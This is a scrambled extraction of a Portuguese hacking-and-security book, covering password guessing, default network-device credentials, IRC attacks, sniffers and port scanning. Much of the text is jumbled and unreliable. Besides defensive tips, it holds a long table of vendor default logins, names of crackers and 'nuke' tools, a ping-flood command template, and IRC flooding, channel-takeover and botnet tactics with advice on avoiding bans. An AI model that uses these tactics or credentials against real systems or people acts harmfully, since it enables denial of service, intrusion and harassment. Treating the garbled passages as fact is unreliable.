Se apossui a m a que você, pois últimamente o sistema não dei a repetir os números nas senhas e com certeza há mais de 5040 clientes no ban
ai testar senha por senha e testando 100 senhas por segundo vai demorar no máximo 100 segundos ou 1 min segundos para descobrir sua senha. Ou no caso das sen rca de 51 segundos.
ou quer mais?
tem uma senha de quatro dígitos e após digitá-las poderá sua conta. a
úmeros que existem são: 0,1,2,3,4,5,6,7,8,9 isso da o total úmeros.
a senha são de quatro dígitos, então
digito, 10 opções no 2º dig
a só calcular 10*10*10*10 quees que são possíveis. Ou se você temos, 10*9*8*7 que é igual a 5040 senhas difernalisarmos veremos que com certeza tem muita gente que
esma senhx
co. Um programinha que v
uto e 40 has sem repetir números vai demorar ceTa bom
s para resolver este problema bloqueiam sua conta ap entativa em que a senha é digitada erradamente, ma anco de dados, e em muitas outras aplicações como logon de rede ou ftp não fazem este bloqueio.
Os bancoós a terceira ts em seu computador os seus arquivos, b
Terrorismo Tecnológico Aprenda Para Sobreviver
191
Programas para descobrir senhas por tentativas têm de monte é só dar uma procu de busca. Este tipo de programa é chamado de “ uta”.
Acontece que ele possui uma tabela com varias senhas usadas
rasileiros
A maioria usa números de telefones, nomes de times de futebol, nome do processador da máquina, seu próprio nome ou
eguidas como 1234, wer,asdf...
a
rada na Internet em sitesdescobrir senha por força br
e vai testando uma por uma até conseguir resultado.
9.2 Senhas dos b
da mãe ou do cônjuge, ou números ou letras s1111, 142536, aaaa, q
Dic : Pense em um nome e em um número, como exemplo o usarei maça e o número 2003, ago mos ado será: m2a0ç0a3, duvido que um hacker por tentativa e ai conseguir descobrir isto. E lembr uanto maior for à mais difícil vai ficar. ó você usar aquele calculo que fize cê r.
uma10 teríamos no total uma possibilidade de nhas diferentes.
inistrador... (acho bom começarem a se isto)
enha - não u
do usuário (login)
nomeresult
ra va intercalar e o
erro v e-se qsenha
É s mos agora pouco e vovai ve
Se usássemos naquele caso ao invés de senha de 4 dígitos uma de 10.000.000.000 se
am usuário e senha padrão como Muitos administradores us
user user, adm admpreocupar mais com
9.3 S sar
• Mesmo nome
Terrorismo Tecnológico Aprenda Para Sobreviver
192
• Senha em branco "senha", "pass" ou "password"
usuários último nome do usuáesposa/marido, pais ou filhos
sobre si mesmo (placa do c ata de ascimento, telefone, CPF). omente números alavra contida em dicionár ndo ou
geiro ra com menos de 6 caract
riodicidade máxima: 6 meses
ver suspeita de amentore que um funcionário que saiba da senha for dido
do s as
• Palavras óbvias, comoa diversos• Mesma senha par
• Primeiro e rio • Nome da • Informação arro, d
n• S• P io se nacional
extran• Palav eres
9.4 Troca de senha
• Periodicidade ideal: 3 meses• Pe • Sempre que hou vaz • Semp
despe
9.5 Quebran enh
De Word Use o programa wfwcd.zip com (19,8k) De ZIP Use o programa zipcrack.zip com (12,3k) DE ARJ Use o programa brkarj10.zip com (13,1k)
Terrorismo Tecnológico Aprenda Para Sobreviver
193
9.6 Senhas padr
witches/Hubs vem com co e sen e ão conhecidas pelos invas xa e à
um que tenhas certas õe ção s as senhas padrão.
s quais são:
s e senhas principa
ão Muitos Routers/S ntas has padrãoestas às vezes s ores dei ndo a redmercê de qualquerentão é mudar toda
informaç s. A solu
Vejamo Tabela com username is: Type/vendor/notes/etc Username Password
3Com admin synnet 3Com read synnet 3Com write synnet 3Com monitor monitor3Com manager r manage3Com security security 3Com_Office_Connect_5x0_ISDN_Routers n/a PASSWORD 3comCellPlex7000 tech tech 3comCoreBuilder7000/6000/3500/2500 g debu synnet 3comCoreBuilder7000/6000/3500/2500 tech tech 3comHiPerARCv4.1.x adm <blank> 3ComLANplex2500 debug synnet 3ComLANplex2500 tech tech 3comLinkSwitch2000/2700 tech tech 3comSuperStackIISwitch 2200 debug3comSuperStackIISwitch 2700 tech
Terrorismo Tecnológico Aprenda Para Sobreviver
194
ACC(Ericsson) netman netman ADC_Kentrox_Pacesetter_Router n/a secret All_Zyxel_equipment n/a 1234 AT&T_3B2_firmware n/a mcp AXIS200/240[netcam] root pass Bay_routers Manager <blank> Bay_routers User <blank> Bay350T_Switch n/a NetICs BaySuperstackII security security BRASX/I01_(DataCom) n/a n letmeiBreezeCOM_adapters2.x(console_only) n/a laflaf BreezeCOM_adapters3.x(console_only) n/a Master BreezeCOM_adapters4.x(console_only) n/a Super Cayman_DSL n/a > <blankCrystalview_outsideview32 n/a crystal digiCorp_(viper?) n/a BRIDGE digiCorp_(viper?) n/a d passworDLink_hub/switches D-Link D-LinkFlowpoint_DSL_installed_by_Covad n/a assword pFlowpoint_DSL2000 admin admin Jetform_design Jetform n/a Lantronics_Terminal_server_port 7000 /a nLantronics_Terminal_server_port 7000 /a nLinksys_DSL n/a admin Livingston_IRX_router !root <blank> Livingston_officerouter !root <blank> Livingston_portmaster2/3 !root > <blankMicroplex_print_server root root
Terrorismo Tecnológico Aprenda Para Sobreviver
195
Motorola-Cablerouter cablecom router Netopia_7100 <blank> > <blankNetopia_9500 netopia netopia Orbitor_console n/a d passworOrbitor_console n/a BRIDGE Osicom(Datacom) sysadm sysadm Shiva root <blank> Shiva Guest <blank> SpeedstreamDSL(Efficient) n/a admin UClinux_for_UCsimm root uClinux Webramp wradmin trancell Alteon ACEswitch 180e (web) admin admin Alteon ACEswitch 180e (telnet) admin <blank> NETPrint ( n/a sysadm all) Xylan Omniswitch admin switch Xylan Omniswitch diag switch Acce ratedDSL CPE and DSLAM sysadm anicust leArrowpoint admin system Cabletron (routers & switches) <blank> <blank> Adtran MX2800 n/a adtran Raidzone raid arrays n/a raidzone CableTron Netgear modem/router and SSR netman <blank> Ascend Pipeline/MAX user n/a Compaq Netelligent n/a superuser Develon Orbitor n/a bridge shiva VPN Gateway n/a shiva/isolation Dlink ISDN routers n/a 1234
Terrorismo Tecnológico Aprenda Para Sobreviver
196
Needed
SMC Accton
Contributed by:
Stephen Friedl <[email protected]> Sebastian Andersson <bof diegeekdie.com> h@Jonathan Leto <[email protected]> [email protected] Mike Blomgren <mik [email protected]> e.Knud Erik Højgaard <[email protected]> [email protected] Roelof Temmingh <roe [email protected]> loAxel Dunkel <[email protected]> Math s Bogaert" <[email protected]> iaextracts from "Hacking Exposed" Jonathan Leto <[email protected]> Chri wen <[email protected]> s OJim Wildman <[email protected]> Santiago Zapata <[email protected]> Brian S. DuRoss <[email protected]> Eric Knight <[email protected]> Max Vision [email protected]
Terrorismo Tecnológico Aprenda Para Sobreviver
197
Lou Albano mist [email protected] Mike Ireton [email protected] bacano [email protected] Karl Greenwood [email protected] LBE
ast Updated on Wed Jul 12 00:42:05 SAST 2000 y Roelof Temmingh mail: [email protected]
I put the stuff on here just the way I receive it..its not verified! Lembre-se Arquivos, programas, vírus, trojans, podem ser escondidos
arquivos dentro de fotos como em arquivos.gif como é o caso em que o programa Hide and Seek v. 4.1 pode mesclar os dois arq
uivos. E um programa espião pode ser instalado para copiar as suas senhas.
Terrorismo Tecnológico Aprenda Para Sobreviver
199
10.1 Spam – A praga no e-mail
alma, não é um novo tipo de vírus, Spam na verdade são mensagens mandadas em série, isto é são aqueles e-mails que o pe
ue aumente cada vez mais.
á também sites que após um cadastro, ficam mandando noticias, previsões de tempo, anúncios de compra e venda entre outros. Até parece interessante durante alguns dias, mas logo você não vai mais ter interesse e só servirá para lotar sua caixa de e-mails.
problema é bem mais grave do que se pensa, já que junto ao e-mail poderá vir um vírus ou um trojan. Uma vez aberto este e-mail o computador estará infectado. Então desde já instale um bom antivírus que proteja não só a máquina, mas que também cheque todos os e-mails recebidos e enviados.
ara parar de receber as correspondências de Spam, você pode bloquear os e-mails, estes podem ser a partir de determinados conteúdos ou de um determinado usuário. Para bloquear você pode utilizar uma opção no Outlook ou no software que você utiliza para ver as suas correspondências (geralmente todos softwares de e-mail possuem está função). Ou então pela própria página prestadora de serviços de e-mail como o BOL, Globo.com, Hotmail, UOL etc.
10.2 E-Mail Bomba
C
ntelho de um amigo seu fica te repassando, como piadas, mensagens, textos... Em 2003 estimasse que 70% do trafego de e-mail seja spam e a previsão é q
H
O
P
Terrorismo Tecnológico Aprenda Para Sobreviver
200
Às vezes até serviço dos para este: o e-mail bomba consiste no envio de muitos e-mails em um tempo muito rápido, (ou pode ser um e-mail que se reproduz au
s de Spam são utiliza
tomaticamente), assim quando o usuário o abrir ele irá se multiplicar, a memória do computador provavelmente vai ficar superlotada e a máquina vai travar.
Não há muito que fazer neste caso a não ser usar o antivírus para a proteção, e se o sistema travar só resta mesmo reiniciá-lo e após isso tentar apagar este e-mail.
Terrorismo Tecnológico Aprenda Para Sobreviver
201
Capítulo XI
IRC – Não pense que não é importante aprender sobre Chats,
pois na verdade é muito importante, já que muitos usuários os usam escondido e o tempo todo!
Terrorismo Tecnológico Aprenda Para Sobreviver
202
11.1 Introdução
Neste momento é claro que você está se perguntando, o que
tem a ver o IRC, com segurança para aeronáutica, bancos, sua empresa... e até na sua casa!
Simples, muitos usuários acabam que ao invés de trabalhar ficam teclando, ou o Administrador ao invés de cuidar da rede fica papeando em salas de Chat. Então estou disponibilizando um manual do IRC. Para que vocês possam saber o que é possível
com este serviço.
Essa é uma antiga, elegante e efetiva maneira de paz com que a vítima mande muita informação para um servidor, que a
IRC client dele tenta processar essa informação, manda muitos dados para o servidor, que então vai
Existem muitos tipos de floods, mas escolher o melhor provavelmente trará omo os DCC e CTCP. Já os: Text, Notice, Invite floods, Crap floods não funcionam mesmo, ele te mostra à informação que derrubou o clie
d diferentes. São eles: DCC Chat flood, que manda
fazer
11.2 Flood
desconecta. Para tal são necessários clones. Clones são outras conexões com o servidor. Cópias do seu IRC client. O flood script, manda os clones enviarem muita informação simultaneamente para a pessoa. Quando o
desconectá-lo.
um resultado mais rápido c
nte, mas na verdade não fez foi nada. Outro fator importante é números de clones que você vai usar. Para dar flood em uma única pessoa, a melhor aposta que você pode fazer são três clones CTCP em floods como Clientinfo, Userinfo ou Version. ECHO floods são extremamente poderosos, porém requerem mais clones. DCC floods são muito efetivos também. Existem 4 tipos de DCC floo
Terrorismo Tecnológico Aprenda Para Sobreviver
203
mm
ilhares de janelas de DCC chat para a pessoa; DCC send flood, anda milhares de DCC send (Se os DCCs forem aceitos
automaticamente pode-se encher o HD de arquivos desagradáveis ou até fazer o micro trava ria do computador vai lotar. DCC Resume e Accept são outros dois tipos. Esses últimos foram a melhor forma de flood encontrada, mas IRC clients não os suportam mais, tornando eles fúteis.
da pessoa, mas a maioria não sabe sob
acontece quando você põe um bot dentro do splited Server, com o ck da pessoa que você quer matar. No netmerge, as duas
morrem. Esse método não funciona na undernet. O outro método é
r já que a memó
Quando usar clones ou fazer floods deve-se ter cuidado para não ser pego. Isso acarretaria em um K-line. Para prevenir que isso aconteça, lembre: Não use clones se não for absolutamente necessário. Destrua seus clones quando o objetivo for alcançado! Use "nick changing" clones pra dar flood. Todos sabem sobre o /whois para ver informações
re o /whowas. Assim, se o clone mudar de nome depois do flood, a vítima nunca vai saber quem o fez. NUNCA dê floods em canais com IRCops ou Network admins! Isso, certamente, vai lhe custará um K-line. Se for possível, faça o flood junto de um amigo, quanto menos clones por IP menor a chance de você ser pego.
Lembre-se que quanto mais rápida for sua conexão melhores resultados você terá, então é muito difícil derrubar alguém se esta conectado por linha discada e a vítima estiver por uma conexão de banda larga. E muitos usuários atacando uma única vítima também conseguira melhores resultados.
11.3 Colisão de Nicks
A colisão de Nicks ocorre quando duas pessoas estão usando o mesmo nick. Como os servidores não podem suportar isso, as pessoas são desconectadas. Existem dois tipos de colisão de Nicks. A colisão por split server e a por lag. A por split Server
ni
Terrorismo Tecnológico Aprenda Para Sobreviver
204
chamado de colisão r feito quando a pessoa muda de nick. O que acontece é isso: Primeiro lammer muda de nick. Segundo o script vê e manda um sinal para o bot qu
Tomar canais é u seu poder ou se vingar de um inimigo. É o motivo básico das guerras de IRC, on role de território. Essa seção contém informações úteis para
P. Contudo se seu não cair temos um dilema. Um canal sem OP e com duas pessoas o querendo. O que você faz? Corra para um netsplit!
por lag. Esse só pode se
e está no servidor laged e esse muda o seu nick para o novo nick da vítima. Terceiro em uns poucos segundos de lag o servidor em que o bot está dá um kill na outra pessoa, porque acha que o seu bot pegou o nick primeiro. Esse não é um bom método para um takeover, mas é divertido ver um bando de gente recebendo kill num grande canal.
11.4 Tomando Canais
ma boa maneira de mostrar
c tfazê-lo de várias maneiras.
11.5 Flood no Canal
Esse método é divertido, mas a parte mais difícil é que cada vez mais pessoas estão ficando imunes ao flood. Conseguindo dar flood em todas as pessoas o resto é fácil. Pegue todos os clones que você usou e descarte-os. Depois entre no canal e pegue O
Terrorismo Tecnológico Aprenda Para Sobreviver
205
u ar as banlists, as esvazie e mude os modos do canal. Isso almente acaba com os servidores que já estão mal. Eles ficam
ocar o canal nos modos normais, isso causa um lag terrível que leva o ca ém com os bots que não estão splited. Is rash. Se você não pode hackear os OPs pelo menos tem a sua vingança. Essa bri
11.6 Netsplit
Um canal sem OP é um alvo fácil para um netsplit. O que você faz é o seguinte: Quando achar um servidor splited conecte-se a ele. Se não houver ninguém no canal você ganha OP só entrando no canal. Com o OP, basta esperar por um netmerge e quando todos estiverem no canal novamente você vai ser o único OP, podendo fazer o que quiser!
Fazer isso com um canal que já tem OPs não é fácil. Na Undernet é impossível. Mas isso não quer dizer que você não possa se divertir. Pegue o OP e espere um netmerge. Quando as pessoas voltarem ao canal, rode um desync. O que ele faz, é m dretentando col
nal à ruína. Isso acaba tambso pode causá-los flood ou c
ncadeira pode levar o canal a ficar mal por uma meia hora algumas vezes.
Se você é sortudo o suficiente para estar numa rede lammer que ainda não tem proteção anti-nethack, você poderá tomar canais com netsplit, bastando ter o script certo. Primeiro - você precisa de um servidor splitado sem proteção. O que acontece é que quando o servidor quiser dar OP para alguém ele vai, na verdade, deOPar essa pessoa. Segundo - outro boa maneira de fazer isso é tendo como dar um kickban em cada pessoa que entrar no canal por um netmerge. Isso combinado com o netsplit protection fará você tomar o canal depois de uma simples batalha.
Terrorismo Tecnológico Aprenda Para Sobreviver
206
11.7 Pedindo ao OP
cê deOPar todos eles. Os C ps não podem fazer nada contra isso. A melhor maneira de
anhar OP é ficar n o depois peça para s entra no canal faz tempo e quer ajudar manter a ordem... Depois o script cuida de deOpar todos em massa, isso é f cil. O que o script vai fazer é ób
de guerra estão ficando cada vez mais avançados. ontudo, os servidores e os IRCops também estão ficando cada
vez melhores. Muitos servidores incorporam o Clone Detection. Isso significa listar as pessoas comparando os IP's e notificando os IRCops. Isso pode tornar impossível fazer um número de clones suf ientes para dar um flood em alguém. Alguns servidores têm proteção contra táticas de netsplit takeover. Esse tipo de coisa pode deter o hacking contra OPs durante um netsplit, permitindo somente tomar canais que não tenham OP. Anti Collide é também usado em muitos servidores. Fazendo com que os dois usuários sej m mortos numa colisão por troca de nick.
Essa é a maneira mais fácil de tomar um canal. É efetiva e legal, os significa te darem OP e voIR og um canal um pouco, sendo amável e prestativ
e ele pode te OPar? Diga que já
ávio: logo quando você ganhar o OP ele vai tirar o OP de todos
os outros, com exceção de você. Eles nem vão ter tempo de reagir! Depois de estar sozinho como OP do canal você poderá fazer o que quiser, trancar o canal, kickar e/ou banir todo mundo, tudo que der na telha. O canal é seu agora!
11.8 Guerra Avançada
Os scriptsC
ic
a
Terrorismo Tecnológico Aprenda Para Sobreviver
207
11.9 Nuke
Nuke é uma grande arma para tirar alguém de IRC rápido! Funci nuke manda informação para p a por eles, causará erros como "dead Socket", "connection refused", "eof from client" e "machine is not on the network".
Para usar o nuke é preciso primeiro um modem rápido 28.8, ou melhor. Você também precisa do Trumpet© Winsock. Programa dial up que se comunica rapidamente com o modem. Esse programa pode ser facilmente encontrado na web. Agora só é preciso de um programa de Nuke. Eu recomendo o Winuke 4 by CHAOS INC. ou Wnewk para máquinas Windows, ou se você usa um mac, MAC NUKE. Depois de pegar esses programas, é fácil tomar canais, e matar nicks rapidamente.
11.10 Bombas ICMP
ICMP é uma maneira extremamente poderosa de tirar a pessoa, não só de IRC, mas de sua conexão com a Internet. Funciona dessa maneira: ela manda mensagens ICMP, em uma taxa muito alta de velocidade, causando barulho na linha, e modem lag. Causa tanto lag, que seu ping aumenta terrivelmente e o joga pra fora do IRC server.
Para usar o ICMP você precisa de um Unix Shell account. Por que? Porque para usar o ICMP efetivamente você precisa de mais do que um modem pode oferecer. Você precisa de uma T1, pelo menos. Existem muitos programas de ICMP para Windows disponíveis, mas eles não trabalham muito bem. É a velocidade que importa nessa hora.
Aqui estão duas formas de usar ICMP num Unix shell: Ping -s (ip address) (packet size) (# of packets)
ona assim: O programa deessoa no servidor e ela é ferrad
Terrorismo Tecnológico Aprenda Para Sobreviver
208
Ping -s (packet size(ip address) (IP address) é o *!*@seja.la.oque.for (packet size)
é o tamanho de cada pacote a mandar, tente 30kb (# of packets) é q
ara juntos combinarem seus clones. Existem vantagens e desvantagens dos dois. As vantagens dos botnets é que estão sempre online por as desvantagens é que não s icos quanto uns clones oodnet.
) -c (# of packets) <-f>
uantos pacotes mandar 3000 é um bom número -f é opcional em segundo, e manda pacotes a 20/seg.
11.11 Botnet/Floodnet
É cada vez mais difícil usar clones sem ser pego. Você precisa de uma maneira de usar o flood sem ser detectado. Como fazer isso? Floodnet. Existem dois tipos diferentes de Floodnet. O primeiro é com Eggdrop bots, esses botnets são compreendidos como eggdrops ligados, e tem um script de flood comum. Existem botnets com muitas centenas de ligações. É muito difícil parar o flood deles. A outra maneira, é usar scripts individuais. Os scripts têm comandos comuns, e permitem que usuários com o mesmo script de se liguem, p
que estão em um Shell. Masão tão dinâm
fl
Terrorismo Tecnológico Aprenda Para Sobreviver
210
12.1 Introdução
Os sniffers (farejadores), funcionam mais ou menos como um cão
ões transmitidas pelos protocolos, podendo então capturar conversas, textos, mensagens e qualquer outra coisa que esteja trafegando pela rede. Nada que seja entrada e saída de dados escapará ileso, ele abre os pacotes e os salva como do depois como um documento.txt. Copia mesmo sendo em um servidor de ftp, chats, aplicativos, editores
farejador que fica espionando todas as informações que passam por ele. Podendo fazer parte de um Trojan (cavalo de tróia). Depois de instalado um Sniffer captura tudo o que trafega pela rede e o que é feito localmente (no computador onde ele reside). Na verdade ele não passa de um espião, copiando tudo o que passa por ali sendo o que entra por dispositivos de input, ou seja, o teclado, e algumas versões copiam as informaç
um texto podendo ser li
de texto, enfim tudo o que for feito vai sendo salvo. Existem sniffers para Unix, Linus, Windows... enfim para todas as plataformas.
Na pratica.
Terrorismo Tecnológico Aprenda Para Sobreviver
211
(Sniffer IRIS versão 3.6)
12.2 Filtrando pacotes na rede
É claro que para capturar os pacotes da rede o sniffer tem que
ter acesso a eles. Em uma rede ponto a ponto, onde não se tem um servidor todos recebem os protocolos em qualquer máquina o programa ira pegar as informações, porém em uma rede com servidor e sub-redes não. Em uma super rede o sniffer para capturar os pacotes tem que estar instalado no servidor, obrigando o hacker a invadir o servidor e instalar o programa lá dentro. No caso da Internet, o sniffer teria que ser instalado na máquina do provedor e somente irá capturar as informações de quem estiver conectado por este provedor. Geralmente em provedores a idéia é capturar logins e senhas para conexão e informações sobre os usuários. Mas em
Terrorismo Tecnológico Aprenda Para Sobreviver
212
empresas pode-se pegar informações, documentos, e tudo mais que estiver trafegando pela rede, ou localmente no caso de estar ins se passa pela máquina.
banco poderia copiar todas as informações de um cliente inclusive sobre sua conta e a senha.
Existem algumas opções no Sniffer que possibilita filtrar os tipos
de pacotes a serem salvos. Vamos supor que queira descobrir todas as senhas que comecem com a letra “M”. Após configurar o sniffer e esperar, ele começa a me enviar os pacotes recebidos já “selecionados” começando com a letra “M”, estes podem ser enviados para você via e-mail. Existem muitos desses spys pela Internet que podem ser pegos gratuitamente, e tem muitos administradores, chefes ou até um “amigo” que instalam esses aplicativos para vigiar os seus funcionários e conhecidos, e em alguns casos até os expondo ao ridículo já que assim poderão ler seus e-mails e até dizer para alguém que tipo de mensagem você vê.
12.4 Roteadores
Alguns sniffers conseguem obter dados direto do roteador. O que quer dizer que no modelo OSI ele consegue ler as informações contidas na camada 3. Então mesmo que seja instalada uma proteção no sistema operacional, como um anti-sniffer ou um antivírus que possua uma boa proteção não adiantaria de nada se o sniffer estiver pegando os dados diretamente roteadores. Este que ao rotear as informações geram uma copia e as envia ao espião.
talado para pegar somente o queÉ bem perigoso, pois em um
12.3 Capturando senhas
Terrorismo Tecnológico Aprenda Para Sobreviver
213
Para se defender d dministrador tiver a consciência de não deixar o roteador mofando e aplicar as cor
12.5 Anti-Sniffers
São programas q e ninguém esta copiando suas informações e retransmitindo para alguém.
sor, ele envia vários con
elhor!)
isto somente se o a
reções necessárias para atualizar o próprio roteador. O ideal seria procurar a página do fabricante e verificar se existe alguma dica ou informação sobre o assunto. E Torcer para que o Fabricante se preocupe com isto! Por isso na hora de comprar um root tome cuidado. Já dizia minha avó que o barato sai caro!
ue ficam monitorando para ver s
Há bons e péssimos anti-sniffers, uns não conseguem monitorar direitos e outros acabam deixando o seu sistema lento.
Os melhores são os que enganam o invateúdos falsos para o hacker e este vai imaginando que está
obtendo sucesso, quando na verdade esta só recebendo informações erradas.
Uma boa idéia é usar um Honeypot com um anti-sniffer.
(Bons Sniffers)
• DNMENG • ICMP DATA SNIFFER • LANGUARD • SHOMITI • IRIS (provavelmente o m
Terrorismo Tecnológico Aprenda Para Sobreviver
214
Capítulo XIII
Scanners - Verdadeiros Robôs em busca de brechas!
Terrorismo Tecnológico Aprenda Para Sobreviver
215
13.1 Introdução Todos aplicativos que são lançados para a venda, de qualquer
empresa, chega ao usuário com muitos Bugs. Esses podem vir a ser uma ameaça à segurança se não forem localizados e corrigidos. Então para analisar e testar todos os aplicativos e o próprio sistema operacional é que se tem o scanner, ele procura erros. Muitos ha
exposto a ata
13.2 Falhas em um host Usamos então o scanner para detectar as falhas, ele testará
cada porta e seu serviço em busca de erros do aplicativo ou erros qu
erta e que esta sendo usada pelo sistema, como a porta 80 (www).
lo mudando sua estrutura, as informações contidas... Internet Information Server e o Apache, por serem os mais
conhecidos são também um dos que mais possuem falhas conhecidas como a de deixar o invasor entrar na rede ou gerar um Buffer Overflow que faz com que a memória do servidor seja toda consumida, travando o sistema.
ckers também o utilizam, pois assim ficam sabendo onde o sistema está vulnerável, ficando assim facilmente
ques.
e o administrador cometeu ao configurá-lo. Tentando proteger o seu sistema, atualmente usa-se um firewall,
este apenas deixa habilitada determinada porta do computador, bloqueando as outras para que não seja atacado, porém o ataque pode ser feito pela torta que ficou ab
Servidores World Wide Web, são os que guardam as home pages para que qualquer um com um computador possa acessá-las, mas esses servidores possuem inúmeras falhas que podem ser usadas para invadir, podendo então tirar o site do ar, ou mesmo desarrumá-
Terrorismo Tecnológico Aprenda Para Sobreviver
216
Mas não é só a www, são todas as portas e serviços que possuem os erros.
13.3 Portas e Serviços Ativos O total de portas em um computador é de 65535, sendo elas
TCP e UDP. Cada uma executa um determinado serviço, uns exemplos são:
Nº da porta – Serviços: 21 - FTP (File Transfer Protocol) 235 - SMTP (Simple Mail Transfer Protocol)
WWW
a aplicação que iremos utilizar, quando fize ma porta. Sendo alg mo a do ICQ ele pe a e a usa na próxima vez rá outra porta disponível, est é elas não executam ne .
e verificar quais dessas est Shadow Scan. Testará as 65 o qual porta e serviço estão sendo utilizados.
- TELNET 279 - FINGER 80 - Qualquer que sejamos algo em uma rede ou na Internet usamos uumas delas que sempre mudam de serviço coga uma porta que não está sendo utilizad que você conectar na Internet ele pegaas são as portas randômicas, isto cessariamente a mesma aplicação sempreUm scanner de Portas faz o trabalho dão ativas, um bom scan é o Haktek e o 535 uma por uma e retornará mostrand
Terrorismo Tecnológico Aprenda Para Sobreviver
217
Podemos até mesmo passar o scan na nossa rede ou no nosso computador para saber quais portas estão abertas, e digamos que ele nos informe que: 80 e a 12345 estão ativas.
A 80 é a de www A 12345 é a do Net Bus EPA! Netbus é um trojan, isto quer dizer que ele esta instalado e
ativo. Pronto agora sabemos que a rede está infectada. E é assim mesmo que um invasor faz, vai scanneando pela
Internet até achar
ub-redes, essas são pequenas redes que compartilham o mesmo servidor. Novamente os Shadow Scan, o Haktek lideram sendo os melhores para descobrir quem são ntão quais são os hosts ativos e o seu DNS (nome).
os que um hacker queira os hosts da empresa ATACADA (não sei se essa empresa existe só peguei um nome como exemplo)
alguém que já esteja contaminado.
13.4 Máquinas ativas da subnet Um servidor possivelmente possui algumas s
essas máquinas. Ele descobre e
Digam
Primeiro é só abrir uma janela do DOS e digitar ping mais o endereço.
Terrorismo Tecnológico Aprenda Para Sobreviver
218
Após dar enter ele retorna mostrando que o IP é 200.200.200.200
Agora com o scanner coloca-se o IP e pede para que ele localize
os hosts. E nos retorna que: 200.200.200.125 - internet.atacada.com.br 200.200.200.30 - campus.atacada.com.br 200.200.200.15 - route.atacada.com.br 00.200.200.09 - diretor.atacada.com.br
00.54 - server.atacada.com.br 200.200.200.79
00.200.200.55 - ftp.atacada.com.br
2200.200.2
- fabio.atacada.com.br ail.atacada.com.br 200.200.200.189 - em
2
Terrorismo Tecnológico Aprenda Para Sobreviver
219
Digamos que anteriormente o hacker não havia conseguido invadir o servidor, pois este estava bem protegido, mas agora ele po
bios
O netbios não é u função dele é de prover a comunicação de uma r de. Como não da para rotea-lo, necessariamente todas as máquinas ligadas por ele tem que estar
O bom mesmo é não usar o netbios, mas se precisar faça o
- Se o computador não pertencer a nenhuma rede ou não
- Se usar Linux e Windows cuidado com o Samba
de atacar uma sub máquina e pegar as informações! Ou até mesmo instalar um sniffer no roteador já que agora ele
sabe que este está na 200.200.200.15 - route.atacada.com.br Ou instalar um sniffer em uma máquina qualquer e começar a
recolher dados que estão passando pela rede.
13.5 Scanneando o net
m protocolo roteavel. E a e
na mesma sub rede. Se scanneado e invadido será possível mapear drives de todos os outros micros ligados a ele.
13.6 Como Evitar então?
seguinte:
precisar compartilhar arquivos pela Internet, desabilite as opções “Compartilhar arquivos e impressoras”
- Coloque senhas para acesso. - Corrija todos os Bugs do sistema.
Terrorismo Tecnológico Aprenda Para Sobreviver
220
E por fim passe um bom scanner como o NAT (Netbios Auditing Tool) para ver se ainda possui alguma falha.
13.7 HTTP e FTP
mas e falhas ativos, as nas
an. muito
ui uma uito grande em relação aos outros protocolos.
or ser tão complicado ele acaba possuindo muitos erros, mas são as vezes
á um
lista de mas a serem scanneados, então
ue um novo erro é encontrado o scan fica sabendo através tualizações.
é este se for
Tanto quanto o HTTP e FTP podem ser scanneados por um scan de vulnerabilidade, este pode encontrar erros em sisteainda vir com um guia ensinando como utilizar as encontradas. Alguns scanners podem descobrir os hosts analisar as portas e analisar as vulnerabilidades encontradportas.
Os melhore são: Security Shadow Scan, Simpsons, Stealth ScOs dois protocolos possuem inúmeras falhas, porém o ftp é
interessante por ser um dos protocolos existente que posscomplexibilidade mPum pouco mais difíceis de serem encontrados e algumsendo um pouco complicado utilizar essas falhas, por isso hcapítulo a respeito do FTP.
Muitos desses scans possuemrros a serem procurados nos siste
up-date atualizando sua esempre qe suas ad
13.8 Analisando Firewalls Os firewalls são alvo de muitos testes, pois como
aplicativo que tenta proteger o sistema, sendo que,
Terrorismo Tecnológico Aprenda Para Sobreviver
221
descobertos falhas de proteção e implementação será fácil derrubar
os de uais ele
neira m os pacotes poderá ver como o firewall está
a onde está enviando estes pacotes. Isto acontece m administradores que não fazem atualizações.
em es.
ele tem como rviços estão
/
toda uma rede. A maior parte dos scanners para firewall envia vários tip
pacotes de informações para ver quais o firewall barra e qr por sua barreira, assim ao ser descoberta a mapermite passa
ele lidar codtrabalhando e par
mente coprincipalCom certas informações fica fácil saber qual o tipo de invasãoque o hacker deverá trabalhar para conseguir resultados eficient
Shadow Scan é um bom scan para firewalls.
13.9 Scan em Linux
nmap é uma ótima ferramenta para scannear redes, Ofunção ver os computadores que estão ativos e quais sesendo fornecidos.
mapUma versão pode ser obtida em http://www.insecure.org/n e como a versão é aberta o código pode ser obtido em: ftp://ftp.ee.lbl.gov/libpcap.tar.z
difEste é um software livre e pode ser copiado distribuído, mo icado Pública
por bem
igas do vavam
uitas ar.
enfim pode ser feito tudo dentro dos termos de Licença Geral GNU como publicado pelo Free Software Foundation; Hackers em geral como gostam muito de usar os Linux acabam
itausar esta ferramenta, pois o Nmap faz uma topologia mufeita e demonstrada da rede que ele irá atacar. Versões antsoftware, anteriores a versão 2.0, são bem ruins já que ou trao micro do hacker ou davam uma pane em algum nó da rede m
dovezes chegando a tirar a rede que estava sendo scanneada
Terrorismo Tecnológico Aprenda Para Sobreviver
222
(As informações foram tiradas do próprio site da NMAP) (Nmap network security scanner man page)
Tradução: Antônio Pires de Castro Jr -sT T CP connect() scan: Esta é a mais básica forma de
" scanning, porque não abre uma conexão
YN
ag YN/ACK é recebido, o flag RST é imediatamente viado para encerrar a conexão (atualmente o
TCP scanning. A chamada de sistema, connect(), provida pelo seu sistema operacional é usada para abrir uma conexão para toda porta interessante na máquina. Se a porta está no estado listening, con nect() irá ter sucesso, por outro lado a porta não será alcançada. Uma grande vantagem desta técnica é que você não precisa de nenhum privilégio especial. Qualquer usuário em UNIX está livre para usar esta chamada. Este tipo de scan é facilmente detectável pelo log do host alvo, o qual mostrará o grupo de conexões e mensagens de erro para os serviços os quais
somente para tê-la aceitam, accept(), a conexão imediatamente desligada. -sS
scan: Esta técnica é muito conhecida como TCP SYN "half-open TCP completa. É enviado um pacote com o flag S setado, como se fosse abrir uma conexão real e é esperado pela resposta. Uma resposta SYN/ACK indica que a porta está no estado listening. O flag RST é uma indicação de estado não listening. Se o fl S en
Terrorismo Tecnológico Aprenda Para Sobreviver
223
núcleo do SO faz isso por nós). A principal vantagem
Modos Stealth FIN, Xmas Tree, ou Null scan: Algumas
e scan FIN utiliza o limitado pacote FIN como teste, enquanto
sS)
